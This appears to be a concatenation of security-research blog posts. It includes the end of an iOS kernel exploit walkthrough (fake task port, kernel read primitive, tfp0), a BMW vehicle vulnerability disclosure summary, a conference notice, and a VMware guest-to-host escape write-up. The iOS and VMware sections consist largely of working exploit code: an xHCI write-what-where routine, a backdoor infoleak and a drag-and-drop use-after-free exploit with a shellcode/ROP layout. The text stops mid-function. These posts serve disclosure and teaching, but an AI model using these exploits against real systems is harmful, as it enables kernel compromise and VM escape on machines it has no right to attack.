// the thread port is at +66ch
  // we could parse the kmsg properly, but this'll do...
  // replace the thread port pointer with one to our fake port:
  *((uint64_t*)(original_contents+0x66c)) = fake_port_kaddr;
  
  // replace the ipc_kmsg:
  write(pipe_write_end, original_contents, PIPE_SIZE);

We can read off the kernel address of our buffer from the next field, which points back to the buffer itself given it is the only ipc_kmsg in the queue.

uint64_t pipe_buf = *((uint64_t*)(new_contents + 0x8));
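The self-reference is a property of circular doubly-linked queues: when the first element is enqueued, both of its links point back at itself. The sketch below models that behavior with a stand-in node type. It is an illustration of the data structure only, not XNU's ipc_kmsg code, and the names are ours.

```c
#include <assert.h>
#include <stddef.h>

/* Minimal circular doubly-linked message node, for illustration only. */
struct demo_kmsg {
    struct demo_kmsg *next;
    struct demo_kmsg *prev;
};

/* Enqueue msg at the tail of a circular queue whose first element is *head. */
void demo_enqueue(struct demo_kmsg **head, struct demo_kmsg *msg) {
    assert(head != NULL && msg != NULL);
    if (*head == NULL) { /* empty queue: the message links to itself */
        msg->next = msg;
        msg->prev = msg;
        *head = msg;
        return;
    }
    struct demo_kmsg *first = *head;
    struct demo_kmsg *last = first->prev;
    msg->next = first;
    msg->prev = last;
    last->next = msg;
    first->prev = msg;
}
```

With a single queued message, reading its next field therefore leaks the address of the message itself, which is what the line above relies on.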

Let’s zoom into our ipc_kmsg buffer to observe the change.

Now, the thread_port points to our fake task port! Mission accomplished!

Note: Here, in this particular PoC, *thread_port actually points to a host port because in Step 3 of the previous section, we substitute the thread port with host port. By doing this, we have a leaked host port kernel address, which can be used to obtain kernel’s ipc_space later. We will cover this shortly.

Receive the exception message

User space programs can receive the exception message by a callout to system exception server, exc_server, after which various port rights in the ipc_kmsg will be inserted into calling task’s ipc_space, including our fake task port’s send right (which is really supposed to be a thread port).

We can now simply extract the port name to the fake port from the exception handler callback, from the thread argument:

kern_return_t catch_exception_raise_state_identity
(
 mach_port_t exception_port,
 mach_port_t thread,
 mach_port_t task,
 exception_type_t exception,
 exception_data_t code,
 mach_msg_type_number_t codeCnt,
 int *flavor,
 thread_state_t old_state,
 mach_msg_type_number_t old_stateCnt,
 thread_state_t new_state,
 mach_msg_type_number_t *new_stateCnt
 )
{
  printf("catch_exception_raise_state_identity\n");
  
    
    
  // the thread port isn't actually the thread port
  // we rewrote it via the pipe to be the fake kernel r/w port
  printf("thread: %x\n", thread);
  extracted_thread_port = thread;
  
  mach_port_deallocate(mach_task_self(), task);
  
  // make the thread exit cleanly when it resumes:
  memcpy(new_state, old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
  _STRUCT_ARM_THREAD_STATE64* new = (_STRUCT_ARM_THREAD_STATE64*)(new_state);
  
  *new_stateCnt = old_stateCnt;
  
  new->__pc = (uint64_t)pthread_exit;
  new->__x[0] = 0;
  
  // let the thread resume and exit
  return KERN_SUCCESS;
}

At this point, we have successfully inserted a fake task port into our task’s ipc_space. Isn’t this ingenious?

Build early kernel read primitive

With the fake task port we can build an early kernel read primitive by using pid_for_task().

Given a valid task port, pid_for_task() simply gets a task pointer from the port’s ip_kobject, dereferences it to retrieve the proc pointer from the task’s bsd_info, then dereferences the proc struct to get the pid. Since all it does is some pointer arithmetic and dereferencing, we can create a fake task struct inside the ipc_kmsg we control, work backward, and place the kernel address we would like to read at the correct offset.

uint8_t* fake_task = fake_port + 0x100;

// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;

With every call to early_rk32, we just need to rebuild the task port, fixing the bsd_info pointer address accordingly:

Here, unsurprisingly, 0x10 is just the offset of the p_pid field inside struct proc, as evident in proc_internal.h:

struct proc {
    LIST_ENTRY(proc) p_list;  // Just two pointers, so size 0x10

    pid_t            p_pid;   // Offset 0x10
    void *           task;
    ...
};

The drawback of this technique is that the read is limited to 32 bits, which is the size of a pid_t.
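The pointer chase and the 32-bit limit can be modeled entirely in user space. The sketch below uses a small byte array as toy "kernel memory" and mimics the read primitive by re-aiming a fake task's bsd_info field. Everything here is an assumption made for illustration: the names are ours, the bsd_info offset is invented, and only the 0x10 offset of p_pid comes from the text. It also shows one natural way to build a 64-bit read out of two 32-bit reads.

```c
#include <assert.h>
#include <stdint.h>

#define MEM_SIZE     0x400u
#define OFF_BSD_INFO 0x20u /* hypothetical offset of bsd_info in the fake task */
#define OFF_P_PID    0x10u /* offset of p_pid in struct proc, from the text */

static uint8_t mem[MEM_SIZE]; /* toy "kernel memory", addresses start at 0 */

/* Little-endian load of n bytes (n <= 8) from the toy memory. */
uint64_t load_le(uint64_t addr, unsigned n) {
    uint64_t v = 0;
    assert(n <= 8 && addr + n <= MEM_SIZE);
    for (unsigned i = n; i > 0; i--)
        v = (v << 8) | mem[addr + i - 1];
    return v;
}

/* Little-endian store of n bytes (n <= 8) into the toy memory. */
void store_le(uint64_t addr, uint64_t v, unsigned n) {
    assert(n <= 8 && addr + n <= MEM_SIZE);
    for (unsigned i = 0; i < n; i++)
        mem[addr + i] = (uint8_t)(v >> (8 * i));
}

/* Model of the pointer chase: task -> bsd_info -> p_pid (32 bits). */
uint32_t demo_pid_for_task(uint64_t task) {
    uint64_t proc = load_le(task + OFF_BSD_INFO, 8);
    return (uint32_t)load_le(proc + OFF_P_PID, 4);
}

/* 32-bit read of an arbitrary address by re-aiming the fake bsd_info. */
uint32_t demo_rk32(uint64_t fake_task, uint64_t addr) {
    store_le(fake_task + OFF_BSD_INFO, addr - OFF_P_PID, 8);
    return demo_pid_for_task(fake_task);
}

/* 64-bit read composed from two 32-bit reads. */
uint64_t demo_rk64(uint64_t fake_task, uint64_t addr) {
    uint64_t lo = demo_rk32(fake_task, addr);
    uint64_t hi = demo_rk32(fake_task, addr + 4);
    return lo | (hi << 32);
}
```

Each `demo_rk32` call rewrites the fake task before reading, which mirrors the need to rebuild the fake port for every early read.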

Build full kernel read/write primitive

Notice that the struct ipc_space *receiver field in our fake port and the address space description, vm_map_t map, in our fake task are still missing. We can achieve full kernel read/write by filling in the addresses of ipc_space_kernel and the kernel task’s vm_map.

We can get the kernel ipc_space from the host port we obtained a while ago, with a known offset:

// receiver field
uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));

However, kernel’s vm_map is a bit trickier to get.

Ian Beer’s approach takes the following steps:

Find the kernel task port on the heap
Get kernel’s task from task port
Get the vm_map from kernel task

To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map from it:

// now look through up to 0x4000 of ports and find one which looks like a task port:
  for (int i = 0; i < (0x4000/0xa8); i++) {
    uint64_t early_port_kaddr = first_port + (i*0xa8);
    uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
    
    if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
      continue;
    }
    
    // get that port's kobject:
    uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    if (task_t == 0) {
      printf("weird heap object with NULL kobject\n");
      continue;
    }
    
    // check the pid via the bsd_info:
    uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
    if (bsd_info == 0) {
      printf("task doesn't have a bsd info\n");
      continue;
    }
    uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
    if (pid != 0) {
      printf("task isn't the kernel task\n");
      continue;
    }
    
    // found the right task, get the vm_map
    kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
    break;
  }
  
  if (kernel_vm_map == 0) {
    printf("unable to find the kernel task map\n");
    return;
  }

printf("kernel map:%016llx\n", kernel_vm_map);

After inserting what we just found into our fake port and fake task, we finally get a fully functional, but “fake”, tfp0. Hooray!

Have fun now with your freshly baked tfp0!

Reference

XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
Exception-based exploitation on iOS, Ian Beer
CVE-2018-4241, Common Vulnerabilities and Exposures
Mac OS X Internals - A System Approach, Amit Singh
*OS Internals, Volume III: Security & Insecurity, Jonathan Levin

New Vehicle Security Research by KeenLab: Experimental Security Assessment of BMW Cars

2018-05-22T07:46:12.000Z

Introduction

The research on BMW cars is an ethical hacking research project. In this research, Keen Security Lab performed an in-depth and comprehensive analysis of both the hardware and software of the in-vehicle infotainment Head Unit, Telematics Control Unit and Central Gateway Module of multiple BMW vehicles. By focusing mainly on various external attack surfaces (including GSM network, BMW Remote Service, BMW ConnectedDrive System, Remote Diagnosis, NGTP protocol, Bluetooth protocol, USB and OBD-II interfaces), Keen Security Lab gained local and remote access to infotainment components, T-Box components and UDS communication above a certain speed of selected BMW vehicle modules, and was able to gain control of the CAN buses by remotely executing arbitrary, unauthorized diagnostic requests on BMW in-car systems.

Vulnerability Findings

After conducting an intensive security analysis of the electronic control units of multiple BMW cars, Keen Security Lab found 14 vulnerabilities with local and remote access vectors in BMW connected cars. Seven of these vulnerabilities were assigned CVE (Common Vulnerabilities and Exposures) numbers.
All the following vulnerabilities and CVEs have been confirmed by BMW after we submitted the full report and collaborated with them on technical details:

Attack Chains

In our research, we found several ways to influence the vehicle through different kinds of attack chains that send arbitrary diagnostic messages to electronic control units. Since we were able to gain access to the head unit and telematics control unit, these attack chains aim to transmit arbitrary diagnostic messages through the Central Gateway Module in order to impact or control electronic control units on different CAN buses (e.g. PT-CAN, K-CAN, etc.).

Vulnerable BMW Models

In our research, the vulnerabilities we found mainly exist in the Head Unit, Telematics Control Unit (TCB), and Central Gateway Module. Based on our experiments, we can confirm that the vulnerabilities in the Head Unit affect several BMW models, including the BMW i Series, BMW X Series, BMW 3 Series, BMW 5 Series and BMW 7 Series. The vulnerabilities in the Telematics Control Unit (TCB) affect BMW models equipped with this module and produced from 2012 onward.
The table below lists the vulnerable BMW models we tested during our research, each with the firmware versions of the specific components.

Different BMW car models may be equipped with different components, and even the same component may have different firmware versions during the product lifecycle, so the scope of vulnerable car models is hard for us to confirm precisely. Theoretically, from our perspective, BMW models equipped with these vulnerable components could be compromised if corrective measures have not already been effectively implemented by BMW.

BMW confirmed that the vulnerabilities found are present in the infotainment and T-Box components mentioned above. Updates have already been developed and implemented by BMW (see below).

Disclosure Timeline

The research on BMW cars is an ethical hacking research project. Keen Lab follows the “Responsible Disclosure” practice, which is well recognized by global manufacturers in the software and internet industries, and works with BMW on fixing the vulnerabilities and attack chains listed in this report.

Below is the detailed disclosure timeline.

January 2017: Keen Lab kicked off the BMW security research project internally.
February 2018: Keen Lab proved all the vulnerability findings and attack chains in an experimental environment.
February 25, 2018: Keen Lab reported all the research findings to BMW.
March 9, 2018: BMW fully confirmed all the vulnerabilities reported by Keen Lab.
March 22, 2018: BMW provided the planned technical mitigation measures for the vulnerabilities reported by Keen Lab.
April 5, 2018: CVE numbers related to the vulnerabilities have been reserved. (CVE-2018-9322, CVE-2018-9320, CVE-2018-9312, CVE-2018-9313, CVE-2018-9314, CVE-2018-9311, CVE-2018-9318)
May 22, 2018: This summary report is released to public.
Early 2019: Keen Lab will release the full technical paper.

BMW informed Keen Security Lab that, for all the attacks via cellular networks, BMW started implementing measures in March 2018. These measures have been rolling out since mid-April 2018 and are distributed remotely to the affected vehicles via configuration updates. BMW is developing additional security enhancements in the form of optional software updates, which will be available through the BMW dealer network.

Press Release from BMW Group

The BMW Group is convinced that the presented study constitutes the by far most comprehensive and complex testing ever conducted on BMW Group vehicles by a third party. For this outstanding research work, Tencent Keen Security Lab has been selected as the first winner of the BMW Group Digitalization and IT Research Award.

https://www.press.bmwgroup.com/global/article/detail/T0281245EN

Research Summary Report

Please refer to the following link to learn more about our research:
Experimental Security Assessment of BMW Cars by KeenLab.pdf

Joint Video

About Tencent Keen Security Lab

Tencent Keen Security Lab[1] (abbreviated “Keen Lab”) is a professional security research team under Tencent, focusing on information security research into both attack and protection techniques. In past years, Keen Lab has built security research partnerships with global manufacturers in the software, hardware and internet industries, and has achieved many world-leading security research results.

Since 2015, Keen Lab has run research projects in the IoT[2] and Connected Vehicle categories and built partnerships with manufacturers in the IoT and car industries. In 2016 and 2017, Keen Lab published its globally well-known research on “Tesla Model S and Model X Remote Hacking”, following the “Responsible Disclosure” practice to report the vulnerabilities and attack chains to Tesla[3,4].

[1] https://keenlab.tencent.com/

[2] https://keenlab.tencent.com/zh/2017/04/01/remote-attack-on-mi-ninebot/

[3] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/

[4] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/

TenSec 2018

2018-05-10T13:58:46.000Z

TenSec 2018 will be held on October 10 and 11, bringing together the most heated debates in cybersecurity with leading experts from the best-known technology corporations, car manufacturers and security communities around the world. The summit focuses on Big Data, Artificial Intelligence, Mobile Internet, Cloud Computing, Internet of Things, Blockchain, Virtualization, Intelligent Connected Vehicles and research tools in the security field, and encourages the sharing of cutting-edge, first-class international security technologies and research achievements. We look forward to creating a platform where experts across the security community can discuss security technology innovation and future development trends.

Since its launch in 2016, TenSec has been committed to exploring international frontier security technologies and research, building a long-term and sustainable communication and cooperation platform for international manufacturers and security communities to safeguard emerging Internet forms and user security.

A bunch of Red Pills: VMware Escapes

2018-04-23T12:51:03.000Z

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for the cloud, and VMware Workstation and Fusion for desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to great lengths to offer this isolation, especially on the ESXi product, where virtual machines of different actors can potentially run on the same hardware. So strong isolation is of paramount importance.

The “Virtualization” category was recently introduced at Pwn2Own, and VMware has been among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host, starting from an unprivileged account and resulting in code execution on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how does VMware work?

In a nutshell, it often uses CPU and memory hardware virtualization technologies (although they are not strictly required), so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and memory; it also requires a lot of other hardware to work properly and be useful.

This point is very important because it constitutes one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. This becomes obvious when reading any datasheet describing the hardware/software interface of a PC hardware device.

VMware traps I/O accesses on the virtual device and needs to emulate all those low-level operations correctly: since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore, if you have ever used VMware you might have noticed its copy-paste capabilities and shared folders. How are those implemented?

To summarize, in this blog post we will cover several bugs: some in the “backdoor” functionalities that support those “extra” services such as copy and paste, and one in a virtualized device.

Although a lot of VMware blog posts and presentations were released recently, we felt the need to write our own for the following reasons:

First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
Second, some of the published resources lack either details or code.

So we hope you will enjoy our blogpost!

We will begin with some background information to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components. We will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run, and also handles all the tasks that are impossible to perform from host ring 3.
vmnat: vmnat is responsible for network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles a lot of tasks which are relevant for this blogpost, including much of the device emulation and backdoor request handling. Exploiting the chains we will present results in code execution on the host in the context of vmware-vmx.

Backdoor

The so-called backdoor is not actually a “backdoor”; it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

At the lowest level, the backdoor consists of two I/O ports, 0x5658 and 0x5659: the first for “traditional” communication, the other for “high bandwidth” communication.

The guest issues in/out instructions on those ports following a register convention, and is thereby able to communicate with VMware running on the host.

The hypervisor will trap and service the request.
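As a rough illustration of the register convention, the sketch below only prepares the register values for a low-bandwidth backdoor call; it does not execute the in instruction, so it can be compiled and run anywhere. The magic value and command number are believed to match open-vm-tools (BDOOR_MAGIC, BDOOR_CMD_GETVERSION) and should be checked against that repository; the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define BDOOR_MAGIC          0x564D5868u /* 'VMXh' */
#define BDOOR_PORT           0x5658u     /* "traditional" channel */
#define BDOORHB_PORT         0x5659u     /* "high bandwidth" channel */
#define BDOOR_CMD_GETVERSION 10u

/* Hypothetical container for the registers loaded before `in eax, dx`. */
typedef struct {
    uint32_t eax; /* magic */
    uint32_t ebx; /* command-specific parameter */
    uint32_t ecx; /* command number */
    uint32_t edx; /* I/O port */
} backdoor_regs;

/* Fill in the register frame for a low-bandwidth backdoor request. */
static backdoor_regs backdoor_prepare(uint32_t cmd, uint32_t param) {
    backdoor_regs regs;
    assert(cmd <= 0xFFFFu); /* assumption: command sits in the low 16 bits of ecx */
    regs.eax = BDOOR_MAGIC;
    regs.ebx = param;
    regs.ecx = cmd;
    regs.edx = BDOOR_PORT;
    return regs;
}
```

Inside a guest, these values would be loaded into the corresponding registers right before the in instruction; on a machine that is not running under VMware the instruction simply faults in ring 3.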

On top of this low-level mechanism, VMware implemented some more convenient high-level protocols. We encourage you to check the open-vm-tools repository to discover them; since they have been covered extensively elsewhere, we will not spend too much time on the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

It’s a guest-host interface that we can use.
It exposes complex services and functionalities.
A lot of these functionalities can be used from ring 3 in the guest VM.

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specification alone, which is more than 600 pages long, it’s no surprise that this piece of hardware and its interface are very complex. And the specification only covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG (Microsoft’s version of Control Flow Integrity) and others are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.
ZDI, The Security Landscape: Pwn2Own 2017

The following vulnerabilities were identified and analyzed:
XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure
ZDI, The Results: Pwn2Own 2017 Day Three

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through the “Device Context” structure. The address of a Device Context is stored in the DCBAA (Device Context Base Address Array), whose address is in turn held in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and the DCBAA reside in physical RAM. The XHCI device keeps an internal cache of the Device Context and only updates the copy in physical memory when something changes. When updating the Device Context, the virtual machine monitor maps the guest physical memory containing the Device Context into the memory space of the monitor process, then performs the update. However, the mapping can fail and leave the result variable untouched. The code takes no precaution against this and directly uses the result as the destination address for a memory write, resulting in an uninitialized variable vulnerability.
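The bug pattern described above can be reduced to a few lines. This is a generic simulation with hypothetical names (`map_guest_page`, `update_device_context_vulnerable`, `update_device_context_checked`), not VMware's code: the mapping helper leaves its output parameter untouched on failure, and the vulnerable caller ignores the return value. To keep the example well defined, the stale stack content is modeled by an explicit `stale` argument.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define GUEST_RAM_SIZE 0x1000u
static uint8_t guest_ram[GUEST_RAM_SIZE];

/* Hypothetical mapping helper: on failure it returns false and does NOT touch *out. */
static bool map_guest_page(uint64_t guest_phys, uint8_t **out) {
    if (guest_phys >= GUEST_RAM_SIZE) {
        return false;
    }
    *out = &guest_ram[guest_phys];
    return true;
}

/* Vulnerable pattern: `stale` models whatever was left in the stack slot.
 * Returns the address that would be used as the write destination. */
static uint8_t *update_device_context_vulnerable(uint64_t guest_phys, uint8_t *stale) {
    uint8_t *dst = stale;             /* stands in for an uninitialized local */
    map_guest_page(guest_phys, &dst); /* return value ignored */
    return dst;
}

/* Fixed pattern: initialize the local and bail out when mapping fails. */
static uint8_t *update_device_context_checked(uint64_t guest_phys) {
    uint8_t *dst = NULL;
    if (!map_guest_page(guest_phys, &dst)) {
        return NULL;
    }
    return dst;
}
```

With an invalid guest physical address, the vulnerable variant hands back whatever `stale` held, which is exactly the value an attacker wants to control.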

To trigger this bug, the following steps should be taken:

Issue an “Enable Slot” command to the XHCI. Get the resulting slot number from the Event TRB.
Set the DCBAAP to point to a controlled buffer.
Put an invalid physical address, e.g. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
Issue an “Address Device” command. The XHCI will read the base address of the Device Context from the DCBAA into an internal cache, and the value is a controlled invalid address.
Issue a “Configure Endpoint” command. The bug is triggered when the XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled through the “Configure Endpoint” command, using one of the Endpoint Contexts of the Input Context, which is also on the stack. Therefore we can control the destination address of the write. The contents to be written come from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting in a write-what-where primitive. By combining this with the info leak vulnerability, we can overwrite some function pointers and finally use ROP to get arbitrary code execution.

Exploit code

void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0; // db is a pointer: ring doorbell 0 (command ring)
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0; // db is a pointer: ring doorbell 0 (command ring)
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability in the Backdoor callback handler. A buffer is allocated on the stack when processing backdoor requests. This buffer should be initialized in the BDOORHB callback, but when an invalid command is requested, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The success rate of exploiting this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

We found this bug by fuzzing VMware Workstation and completed a stable exploit chain using this single bug in the last few days of February 2017. Unfortunately, the bug was patched in VMware Workstation 12.5.3, released on 9 March 2017. Afterwards we noticed that few papers discussed this bug, and VMware did not even assign a CVE ID to it. That’s a pity, because it’s the best bug we have ever seen in VMware Workstation, and VMware just patched it quietly. Now we’re going to talk about how to exploit VMware Workstation with this single bug.

Exploit Code

The success rate of this exploit is approximately 100%.

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(call_transport, strlen(call_transport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
